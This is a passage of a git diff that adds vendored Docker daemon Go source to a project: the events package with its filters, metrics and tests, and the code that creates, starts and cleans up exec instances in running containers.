+
+	for i := len(e.events) - 1; i >= 0; i-- {
+		ev := e.events[i]
+
+		if ev.TimeNano < sinceNanoUnix {
+			break
+		}
+
+		if untilNanoUnix > 0 && ev.TimeNano > untilNanoUnix {
+			continue
+		}
+
+		if topic == nil || topic(ev) {
+			buffered = append([]eventtypes.Message{ev}, buffered...)
+		}
+	}
+	return buffered
+}
diff --git a/vendor/github.com/docker/docker/daemon/events/events_test.go b/vendor/github.com/docker/docker/daemon/events/events_test.go
new file mode 100644
index 0000000000..bbd160f901
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events/events_test.go
@@ -0,0 +1,275 @@
+package events
+
+import (
+	"fmt"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/events"
+	timetypes "github.com/docker/docker/api/types/time"
+	eventstestutils "github.com/docker/docker/daemon/events/testutils"
+)
+
+func TestEventsLog(t *testing.T) {
+	e := New()
+	_, l1, _ := e.Subscribe()
+	_, l2, _ := e.Subscribe()
+	defer e.Evict(l1)
+	defer e.Evict(l2)
+	count := e.SubscribersCount()
+	if count != 2 {
+		t.Fatalf("Must be 2 subscribers, got %d", count)
+	}
+	actor := events.Actor{
+		ID:         "cont",
+		Attributes: map[string]string{"image": "image"},
+	}
+	e.Log("test", events.ContainerEventType, actor)
+	select {
+	case msg := <-l1:
+		jmsg, ok := msg.(events.Message)
+		if !ok {
+			t.Fatalf("Unexpected type %T", msg)
+		}
+		if len(e.events) != 1 {
+			t.Fatalf("Must be only one event, got %d", len(e.events))
+		}
+		if jmsg.Status != "test" {
+			t.Fatalf("Status should be test, got %s", jmsg.Status)
+		}
+		if jmsg.ID != "cont" {
+			t.Fatalf("ID should be cont, got %s", jmsg.ID)
+		}
+		if jmsg.From != "image" {
+			t.Fatalf("From should be image, got %s", jmsg.From)
+		}
+	case <-time.After(1 * time.Second):
+		t.Fatal("Timeout waiting for broadcasted message")
+	}
+	select {
+	case msg := <-l2:
+		jmsg, ok := msg.(events.Message)
+		if !ok {
+			t.Fatalf("Unexpected type %T", msg)
+		}
+		if len(e.events) != 1 {
+			t.Fatalf("Must be only one event, got %d", len(e.events))
+		}
+		if jmsg.Status != "test" {
+			t.Fatalf("Status should be test, got %s", jmsg.Status)
+		}
+		if jmsg.ID != "cont" {
+			t.Fatalf("ID should be cont, got %s", jmsg.ID)
+		}
+		if jmsg.From != "image" {
+			t.Fatalf("From should be image, got %s", jmsg.From)
+		}
+	case <-time.After(1 * time.Second):
+		t.Fatal("Timeout waiting for broadcasted message")
+	}
+}
+
+func TestEventsLogTimeout(t *testing.T) {
+	e := New()
+	_, l, _ := e.Subscribe()
+	defer e.Evict(l)
+
+	c := make(chan struct{})
+	go func() {
+		actor := events.Actor{
+			ID: "image",
+		}
+		e.Log("test", events.ImageEventType, actor)
+		close(c)
+	}()
+
+	select {
+	case <-c:
+	case <-time.After(time.Second):
+		t.Fatal("Timeout publishing message")
+	}
+}
+
+func TestLogEvents(t *testing.T) {
+	e := New()
+
+	for i := 0; i < eventsLimit+16; i++ {
+		action := fmt.Sprintf("action_%d", i)
+		id := fmt.Sprintf("cont_%d", i)
+		from := fmt.Sprintf("image_%d", i)
+
+		actor := events.Actor{
+			ID:         id,
+			Attributes: map[string]string{"image": from},
+		}
+		e.Log(action, events.ContainerEventType, actor)
+	}
+	time.Sleep(50 * time.Millisecond)
+	current, l, _ := e.Subscribe()
+	for i := 0; i < 10; i++ {
+		num := i + eventsLimit + 16
+		action := fmt.Sprintf("action_%d", num)
+		id := fmt.Sprintf("cont_%d", num)
+		from := fmt.Sprintf("image_%d", num)
+
+		actor := events.Actor{
+			ID:         id,
+			Attributes: map[string]string{"image": from},
+		}
+		e.Log(action, events.ContainerEventType, actor)
+	}
+	if len(e.events) != eventsLimit {
+		t.Fatalf("Must be %d events, got %d", eventsLimit, len(e.events))
+	}
+
+	var msgs []events.Message
+	for len(msgs) < 10 {
+		m := <-l
+		jm, ok := (m).(events.Message)
+		if !ok {
+			t.Fatalf("Unexpected type %T", m)
+		}
+		msgs = append(msgs, jm)
+	}
+	if len(current) != eventsLimit {
+		t.Fatalf("Must be %d events, got %d", eventsLimit, len(current))
+	}
+	first := current[0]
+	if first.Status != "action_16" {
+		t.Fatalf("First action is %s, must be action_16", first.Status)
+	}
+	last := current[len(current)-1]
+	if last.Status != "action_79" {
+		t.Fatalf("Last action is %s, must be action_79", last.Status)
+	}
+
+	firstC := msgs[0]
+	if firstC.Status != "action_80" {
+		t.Fatalf("First action is %s, must be action_80", firstC.Status)
+	}
+	lastC := msgs[len(msgs)-1]
+	if lastC.Status != "action_89" {
+		t.Fatalf("Last action is %s, must be action_89", lastC.Status)
+	}
+}
+
+// https://github.com/docker/docker/issues/20999
+// Fixtures:
+//
+//2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)
+//2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)
+//2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)
+func TestLoadBufferedEvents(t *testing.T) {
+	now := time.Now()
+	f, err := timetypes.GetTimestamp("2016-03-07T17:28:03.100000000+02:00", now)
+	if err != nil {
+		t.Fatal(err)
+	}
+	s, sNano, err := timetypes.ParseTimestamps(f, -1)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	events := &Events{
+		events: []events.Message{*m1, *m2, *m3},
+	}
+
+	since := time.Unix(s, sNano)
+	until := time.Time{}
+
+	out := events.loadBufferedEvents(since, until, nil)
+	if len(out) != 1 {
+		t.Fatalf("expected 1 message, got %d: %v", len(out), out)
+	}
+}
+
+func TestLoadBufferedEventsOnlyFromPast(t *testing.T) {
+	now := time.Now()
+	f, err := timetypes.GetTimestamp("2016-03-07T17:28:03.090000000+02:00", now)
+	if err != nil {
+		t.Fatal(err)
+	}
+	s, sNano, err := timetypes.ParseTimestamps(f, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	f, err = timetypes.GetTimestamp("2016-03-07T17:28:03.100000000+02:00", now)
+	if err != nil {
+		t.Fatal(err)
+	}
+	u, uNano, err := timetypes.ParseTimestamps(f, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	events := &Events{
+		events: []events.Message{*m1, *m2, *m3},
+	}
+
+	since := time.Unix(s, sNano)
+	until := time.Unix(u, uNano)
+
+	out := events.loadBufferedEvents(since, until, nil)
+	if len(out) != 1 {
+		t.Fatalf("expected 1 message, got %d: %v", len(out), out)
+	}
+
+	if out[0].Type != "network" {
+		t.Fatalf("expected network event, got %s", out[0].Type)
+	}
+}
+
+// #13753
+func TestIngoreBufferedWhenNoTimes(t *testing.T) {
+	m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	events := &Events{
+		events: []events.Message{*m1, *m2, *m3},
+	}
+
+	since := time.Time{}
+	until := time.Time{}
+
+	out := events.loadBufferedEvents(since, until, nil)
+	if len(out) != 0 {
+		t.Fatalf("expected 0 buffered events, got %q", out)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/events/filter.go b/vendor/github.com/docker/docker/daemon/events/filter.go
new file mode 100644
index 0000000000..5c9c527692
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events/filter.go
@@ -0,0 +1,110 @@
+package events
+
+import (
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/reference"
+)
+
+// Filter can filter out docker events from a stream
+type Filter struct {
+	filter filters.Args
+}
+
+// NewFilter creates a new Filter
+func NewFilter(filter filters.Args) *Filter {
+	return &Filter{filter: filter}
+}
+
+// Include returns true when the event ev is included by the filters
+func (ef *Filter) Include(ev events.Message) bool {
+	return ef.matchEvent(ev) &&
+		ef.filter.ExactMatch("type", ev.Type) &&
+		ef.matchDaemon(ev) &&
+		ef.matchContainer(ev) &&
+		ef.matchPlugin(ev) &&
+		ef.matchVolume(ev) &&
+		ef.matchNetwork(ev) &&
+		ef.matchImage(ev) &&
+		ef.matchLabels(ev.Actor.Attributes)
+}
+
+func (ef *Filter) matchEvent(ev events.Message) bool {
+	// #25798 if an event filter contains either health_status, exec_create or exec_start without a colon
+	// Let's to a FuzzyMatch instead of an ExactMatch.
+	if ef.filterContains("event", map[string]struct{}{"health_status": {}, "exec_create": {}, "exec_start": {}}) {
+		return ef.filter.FuzzyMatch("event", ev.Action)
+	}
+	return ef.filter.ExactMatch("event", ev.Action)
+}
+
+func (ef *Filter) filterContains(field string, values map[string]struct{}) bool {
+	for _, v := range ef.filter.Get(field) {
+		if _, ok := values[v]; ok {
+			return true
+		}
+	}
+	return false
+}
+
+func (ef *Filter) matchLabels(attributes map[string]string) bool {
+	if !ef.filter.Include("label") {
+		return true
+	}
+	return ef.filter.MatchKVList("label", attributes)
+}
+
+func (ef *Filter) matchDaemon(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.DaemonEventType)
+}
+
+func (ef *Filter) matchContainer(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.ContainerEventType)
+}
+
+func (ef *Filter) matchPlugin(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.PluginEventType)
+}
+
+func (ef *Filter) matchVolume(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.VolumeEventType)
+}
+
+func (ef *Filter) matchNetwork(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.NetworkEventType)
+}
+
+func (ef *Filter) fuzzyMatchName(ev events.Message, eventType string) bool {
+	return ef.filter.FuzzyMatch(eventType, ev.Actor.ID) ||
+		ef.filter.FuzzyMatch(eventType, ev.Actor.Attributes["name"])
+}
+
+// matchImage matches against both event.Actor.ID (for image events)
+// and event.Actor.Attributes["image"] (for container events), so that any container that was created
+// from an image will be included in the image events. Also compare both
+// against the stripped repo name without any tags.
+func (ef *Filter) matchImage(ev events.Message) bool {
+	id := ev.Actor.ID
+	nameAttr := "image"
+	var imageName string
+
+	if ev.Type == events.ImageEventType {
+		nameAttr = "name"
+	}
+
+	if n, ok := ev.Actor.Attributes[nameAttr]; ok {
+		imageName = n
+	}
+	return ef.filter.ExactMatch("image", id) ||
+		ef.filter.ExactMatch("image", imageName) ||
+		ef.filter.ExactMatch("image", stripTag(id)) ||
+		ef.filter.ExactMatch("image", stripTag(imageName))
+}
+
+func stripTag(image string) string {
+	ref, err := reference.ParseNamed(image)
+	if err != nil {
+		return image
+	}
+	return ref.Name()
+}
diff --git a/vendor/github.com/docker/docker/daemon/events/metrics.go b/vendor/github.com/docker/docker/daemon/events/metrics.go
new file mode 100644
index 0000000000..c9a89ec0ed
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events/metrics.go
@@ -0,0 +1,15 @@
+package events
+
+import "github.com/docker/go-metrics"
+
+var (
+	eventsCounter    metrics.Counter
+	eventSubscribers metrics.Gauge
+)
+
+func init() {
+	ns := metrics.NewNamespace("engine", "daemon", nil)
+	eventsCounter = ns.NewCounter("events", "The number of events logged")
+	eventSubscribers = ns.NewGauge("events_subscribers", "The number of current subscribers to events", metrics.Total)
+	metrics.Register(ns)
+}
diff --git a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go
new file mode 100644
index 0000000000..3544446e18
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go
@@ -0,0 +1,76 @@
+package testutils
+
+import (
+	"fmt"
+	"regexp"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/events"
+	timetypes "github.com/docker/docker/api/types/time"
+)
+
+var (
+	reTimestamp  = `(?P<timestamp>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}.\d{9}(:?(:?(:?-|\+)\d{2}:\d{2})|Z))`
+	reEventType  = `(?P<eventType>\w+)`
+	reAction     = `(?P<action>\w+)`
+	reID         = `(?P<id>[^\s]+)`
+	reAttributes = `(\s\((?P<attributes>[^\)]+)\))?`
+	reString     = fmt.Sprintf(`\A%s\s%s\s%s\s%s%s\z`, reTimestamp, reEventType, reAction, reID, reAttributes)
+
+	// eventCliRegexp is a regular expression that matches all possible event outputs in the cli
+	eventCliRegexp = regexp.MustCompile(reString)
+)
+
+// ScanMap turns an event string like the default ones formatted in the cli output
+// and turns it into map.
+func ScanMap(text string) map[string]string {
+	matches := eventCliRegexp.FindAllStringSubmatch(text, -1)
+	md := map[string]string{}
+	if len(matches) == 0 {
+		return md
+	}
+
+	names := eventCliRegexp.SubexpNames()
+	for i, n := range matches[0] {
+		md[names[i]] = n
+	}
+	return md
+}
+
+// Scan turns an event string like the default ones formatted in the cli output
+// and turns it into an event message.
+func Scan(text string) (*events.Message, error) {
+	md := ScanMap(text)
+	if len(md) == 0 {
+		return nil, fmt.Errorf("text is not an event: %s", text)
+	}
+
+	f, err := timetypes.GetTimestamp(md["timestamp"], time.Now())
+	if err != nil {
+		return nil, err
+	}
+
+	t, tn, err := timetypes.ParseTimestamps(f, -1)
+	if err != nil {
+		return nil, err
+	}
+
+	attrs := make(map[string]string)
+	for _, a := range strings.SplitN(md["attributes"], ", ", -1) {
+		kv := strings.SplitN(a, "=", 2)
+		attrs[kv[0]] = kv[1]
+	}
+
+	tu := time.Unix(t, tn)
+	return &events.Message{
+		Time:     t,
+		TimeNano: tu.UnixNano(),
+		Type:     md["eventType"],
+		Action:   md["action"],
+		Actor: events.Actor{
+			ID:         md["id"],
+			Attributes: attrs,
+		},
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/events_test.go b/vendor/github.com/docker/docker/daemon/events_test.go
new file mode 100644
index 0000000000..2dbcc27dfc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events_test.go
@@ -0,0 +1,94 @@
+package daemon
+
+import (
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	eventtypes "github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/events"
+)
+
+func TestLogContainerEventCopyLabels(t *testing.T) {
+	e := events.New()
+	_, l, _ := e.Subscribe()
+	defer e.Evict(l)
+
+	container := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "container_id",
+			Name: "container_name",
+			Config: &containertypes.Config{
+				Image: "image_name",
+				Labels: map[string]string{
+					"node": "1",
+					"os":   "alpine",
+				},
+			},
+		},
+	}
+	daemon := &Daemon{
+		EventsService: e,
+	}
+	daemon.LogContainerEvent(container, "create")
+
+	if _, mutated := container.Config.Labels["image"]; mutated {
+		t.Fatalf("Expected to not mutate the container labels, got %q", container.Config.Labels)
+	}
+
+	validateTestAttributes(t, l, map[string]string{
+		"node": "1",
+		"os":   "alpine",
+	})
+}
+
+func TestLogContainerEventWithAttributes(t *testing.T) {
+	e := events.New()
+	_, l, _ := e.Subscribe()
+	defer e.Evict(l)
+
+	container := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "container_id",
+			Name: "container_name",
+			Config: &containertypes.Config{
+				Labels: map[string]string{
+					"node": "1",
+					"os":   "alpine",
+				},
+			},
+		},
+	}
+	daemon := &Daemon{
+		EventsService: e,
+	}
+	attributes := map[string]string{
+		"node": "2",
+		"foo":  "bar",
+	}
+	daemon.LogContainerEventWithAttributes(container, "create", attributes)
+
+	validateTestAttributes(t, l, map[string]string{
+		"node": "1",
+		"foo":  "bar",
+	})
+}
+
+func validateTestAttributes(t *testing.T, l chan interface{}, expectedAttributesToTest map[string]string) {
+	select {
+	case ev := <-l:
+		event, ok := ev.(eventtypes.Message)
+		if !ok {
+			t.Fatalf("Unexpected event message: %q", ev)
+		}
+		for key, expected := range expectedAttributesToTest {
+			actual, ok := event.Actor.Attributes[key]
+			if !ok || actual != expected {
+				t.Fatalf("Expected value for key %s to be %s, but was %s (event:%v)", key, expected, actual, event)
+			}
+		}
+	case <-time.After(10 * time.Second):
+		t.Fatalf("LogEvent test timed out")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/exec.go b/vendor/github.com/docker/docker/daemon/exec.go
new file mode 100644
index 0000000000..8197426a33
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/exec.go
@@ -0,0 +1,280 @@
+package daemon
+
+import (
+	"fmt"
+	"io"
+	"strings"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/term"
+	"github.com/docker/docker/utils"
+)
+
+// Seconds to wait after sending TERM before trying KILL
+const termProcessTimeout = 10
+
+func (d *Daemon) registerExecCommand(container *container.Container, config *exec.Config) {
+	// Storing execs in container in order to kill them gracefully whenever the container is stopped or removed.
+	container.ExecCommands.Add(config.ID, config)
+	// Storing execs in daemon for easy access via Engine API.
+	d.execCommands.Add(config.ID, config)
+}
+
+// ExecExists looks up the exec instance and returns a bool if it exists or not.
+// It will also return the error produced by `getConfig`
+func (d *Daemon) ExecExists(name string) (bool, error) {
+	if _, err := d.getExecConfig(name); err != nil {
+		return false, err
+	}
+	return true, nil
+}
+
+// getExecConfig looks up the exec instance by name. If the container associated
+// with the exec instance is stopped or paused, it will return an error.
+func (d *Daemon) getExecConfig(name string) (*exec.Config, error) {
+	ec := d.execCommands.Get(name)
+
+	// If the exec is found but its container is not in the daemon's list of
+	// containers then it must have been deleted, in which case instead of
+	// saying the container isn't running, we should return a 404 so that
+	// the user sees the same error now that they will after the
+	// 5 minute clean-up loop is run which erases old/dead execs.
+
+	if ec != nil {
+		if container := d.containers.Get(ec.ContainerID); container != nil {
+			if !container.IsRunning() {
+				return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String())
+			}
+			if container.IsPaused() {
+				return nil, errExecPaused(container.ID)
+			}
+			if container.IsRestarting() {
+				return nil, errContainerIsRestarting(container.ID)
+			}
+			return ec, nil
+		}
+	}
+
+	return nil, errExecNotFound(name)
+}
+
+func (d *Daemon) unregisterExecCommand(container *container.Container, execConfig *exec.Config) {
+	container.ExecCommands.Delete(execConfig.ID)
+	d.execCommands.Delete(execConfig.ID)
+}
+
+func (d *Daemon) getActiveContainer(name string) (*container.Container, error) {
+	container, err := d.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	if !container.IsRunning() {
+		return nil, errNotRunning{container.ID}
+	}
+	if container.IsPaused() {
+		return nil, errExecPaused(name)
+	}
+	if container.IsRestarting() {
+		return nil, errContainerIsRestarting(container.ID)
+	}
+	return container, nil
+}
+
+// ContainerExecCreate sets up an exec in a running container.
+func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) {
+	container, err := d.getActiveContainer(name)
+	if err != nil {
+		return "", err
+	}
+
+	cmd := strslice.StrSlice(config.Cmd)
+	entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmd)
+
+	keys := []byte{}
+	if config.DetachKeys != "" {
+		keys, err = term.ToBytes(config.DetachKeys)
+		if err != nil {
+			err = fmt.Errorf("Invalid escape keys (%s) provided", config.DetachKeys)
+			return "", err
+		}
+	}
+
+	execConfig := exec.NewConfig()
+	execConfig.OpenStdin = config.AttachStdin
+	execConfig.OpenStdout = config.AttachStdout
+	execConfig.OpenStderr = config.AttachStderr
+	execConfig.ContainerID = container.ID
+	execConfig.DetachKeys = keys
+	execConfig.Entrypoint = entrypoint
+	execConfig.Args = args
+	execConfig.Tty = config.Tty
+	execConfig.Privileged = config.Privileged
+	execConfig.User = config.User
+
+	linkedEnv, err := d.setupLinkedContainers(container)
+	if err != nil {
+		return "", err
+	}
+	execConfig.Env = utils.ReplaceOrAppendEnvValues(container.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env)
+	if len(execConfig.User) == 0 {
+		execConfig.User = container.Config.User
+	}
+
+	d.registerExecCommand(container, execConfig)
+
+	d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "))
+
+	return execConfig.ID, nil
+}
+
+// ContainerExecStart starts a previously set up exec instance. The
+// std streams are set up.
+// If ctx is cancelled, the process is terminated.
+func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) (err error) {
+	var (
+		cStdin           io.ReadCloser
+		cStdout, cStderr io.Writer
+	)
+
+	ec, err := d.getExecConfig(name)
+	if err != nil {
+		return errExecNotFound(name)
+	}
+
+	ec.Lock()
+	if ec.ExitCode != nil {
+		ec.Unlock()
+		err := fmt.Errorf("Error: Exec command %s has already run", ec.ID)
+		return errors.NewRequestConflictError(err)
+	}
+
+	if ec.Running {
+		ec.Unlock()
+		return fmt.Errorf("Error: Exec command %s is already running", ec.ID)
+	}
+	ec.Running = true
+	defer func() {
+		if err != nil {
+			ec.Running = false
+			exitCode := 126
+			ec.ExitCode = &exitCode
+		}
+	}()
+	ec.Unlock()
+
+	c := d.containers.Get(ec.ContainerID)
+	logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID)
+	d.LogContainerEvent(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " "))
+
+	if ec.OpenStdin && stdin != nil {
+		r, w := io.Pipe()
+		go func() {
+			defer w.Close()
+			defer logrus.Debug("Closing buffered stdin pipe")
+			pools.Copy(w, stdin)
+		}()
+		cStdin = r
+	}
+	if ec.OpenStdout {
+		cStdout = stdout
+	}
+	if ec.OpenStderr {
+		cStderr = stderr
+	}
+
+	if ec.OpenStdin {
+		ec.StreamConfig.NewInputPipes()
+	} else {
+		ec.StreamConfig.NewNopInputPipe()
+	}
+
+	p := libcontainerd.Process{
+		Args:     append([]string{ec.Entrypoint}, ec.Args...),
+		Env:      ec.Env,
+		Terminal: ec.Tty,
+	}
+
+	if err := execSetPlatformOpt(c, ec, &p); err != nil {
+		return err
+	}
+
+	attachErr := container.AttachStreams(ctx, ec.StreamConfig, ec.OpenStdin, true, ec.Tty, cStdin, cStdout, cStderr, ec.DetachKeys)
+
+	systemPid, err := d.containerd.AddProcess(ctx, c.ID, name, p, ec.InitializeStdio)
+	if err != nil {
+		return err
+	}
+	ec.Lock()
+	ec.Pid = systemPid
+	ec.Unlock()
+
+	select {
+	case <-ctx.Done():
+		logrus.Debugf("Sending TERM signal to process %v in container %v", name, c.ID)
+		d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["TERM"]))
+		select {
+		case <-time.After(termProcessTimeout * time.Second):
+			logrus.Infof("Container %v, process %v failed to exit within %d seconds of signal TERM - using the force", c.ID, name, termProcessTimeout)
+			d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["KILL"]))
+		case <-attachErr:
+			// TERM signal worked
+		}
+		return fmt.Errorf("context cancelled")
+	case err := <-attachErr:
+		if err != nil {
+			if _, ok := err.(container.DetachError); !ok {
+				return fmt.Errorf("exec attach failed with error: %v", err)
+			}
+			d.LogContainerEvent(c, "exec_detach")
+		}
+	}
+	return nil
+}
+
+// execCommandGC runs a ticker to clean up the daemon references
+// of exec configs that are no longer part of the container.
+func (d *Daemon) execCommandGC() {
+	for range time.Tick(5 * time.Minute) {
+		var (
+			cleaned          int
+			liveExecCommands = d.containerExecIds()
+		)
+		for id, config := range d.execCommands.Commands() {
+			if config.CanRemove {
+				cleaned++
+				d.execCommands.Delete(id)
+			} else {
+				if _, exists := liveExecCommands[id]; !exists {
+					config.CanRemove = true
+				}
+			}
+		}
+		if cleaned > 0 {
+			logrus.Debugf("clean %d unused exec commands", cleaned)
+		}
+	}
+}
+
+// containerExecIds returns a list of all the current exec ids that are in use
+// and running inside a container.
+func (d *Daemon) containerExecIds() map[string]struct{} {
+	ids := map[string]struct{}{}
+	for _, c := range d.containers.List() {
+		for _, id := range c.ExecCommands.List() {
+			ids[id] = struct{}{}
+		}
+	}
+	return ids
+}
diff --git a/vendor/github.com/docker/docker/daemon/exec/exec.go b/vendor/github.com/docker/docker/daemon/exec/exec.go
new file mode 100644
index 0000000000..933136f965
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/exec/exec.go
@@ -0,0 +1,118 @@
+package exec
+
+import (
+	"runtime"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container/stream"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+// Config holds the configurations for execs. The Daemon keeps
+// track of both running and finished execs so that they can be
+// examined both during and after completion.
+type Config struct {
+	sync.Mutex
+	StreamConfig *stream.Config
+	ID           string
+	Running      bool
+	ExitCode     *int
+	OpenStdin    bool
+	OpenStderr   bool
+	OpenStdout   bool
+	CanRemove    bool
+	ContainerID  string
+	DetachKeys   []byte
+	Entrypoint   string
+	Args         []string
+	Tty          bool
+	Privileged   bool
+	User         string
+	Env          []string
+	Pid          int
+}
+
+// NewConfig initializes the a new exec configuration
+func NewConfig() *Config {
+	return &Config{
+		ID:           stringid.GenerateNonCryptoID(),
+		StreamConfig: stream.NewConfig(),
+	}
+}
+
+// InitializeStdio is called by libcontainerd to connect the stdio.
+func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error {
+	c.StreamConfig.CopyToPipe(iop)
+
+	if c.StreamConfig.Stdin() == nil && !c.Tty && runtime.GOOS == "windows" {
+		if iop.Stdin != nil {
+			if err := iop.Stdin.Close(); err != nil {
+				logrus.Errorf("error closing exec stdin: %+v", err)
+			}
+		}
+	}
+
+	return nil
+}
+
+// CloseStreams closes the stdio streams for the exec
+func (c *Config) CloseStreams() error {
+	return c.StreamConfig.CloseStreams()
+}
+
+// Store keeps track of the exec configurations.
+type Store struct {
+	commands map[string]*Config
+	sync.RWMutex
+}
+
+// NewStore initializes a new exec store.
+func NewStore() *Store {
+	return &Store{commands: make(map[string]*Config, 0)}
+}
+
+// Commands returns the exec configurations in the store.
+func (e *Store) Commands() map[string]*Config {
+	e.RLock()
+	commands := make(map[string]*Config, len(e.commands))
+	for id, config := range e.commands {
+		commands[id] = config
+	}
+	e.RUnlock()
+	return commands
+}
+
+// Add adds a new exec configuration to the store.
+func (e *Store) Add(id string, Config *Config) {
+	e.Lock()
+	e.commands[id] = Config
+	e.Unlock()
+}
+
+// Get returns an exec configuration by its id.
+func (e *Store) Get(id string) *Config {
+	e.RLock()
+	res := e.commands[id]
+	e.RUnlock()
+	return res
+}
+
+// Delete removes an exec configuration from the store.
+func (e *Store) Delete(id string) {
+	e.Lock()
+	delete(e.commands, id)
+	e.Unlock()
+}
+
+// List returns the list of exec ids in the store.
+func (e *Store) List() []string {
+	var IDs []string
+	e.RLock()
+	for id := range e.commands {
+		IDs = append(IDs, id)
+	}
+	e.RUnlock()
+	return IDs
+}
diff --git a/vendor/github.com/docker/docker/daemon/exec_linux.go b/vendor/github.com/docker/docker/daemon/exec_linux.go
new file mode 100644
index 0000000000..5aeedc3470
--- /dev/null
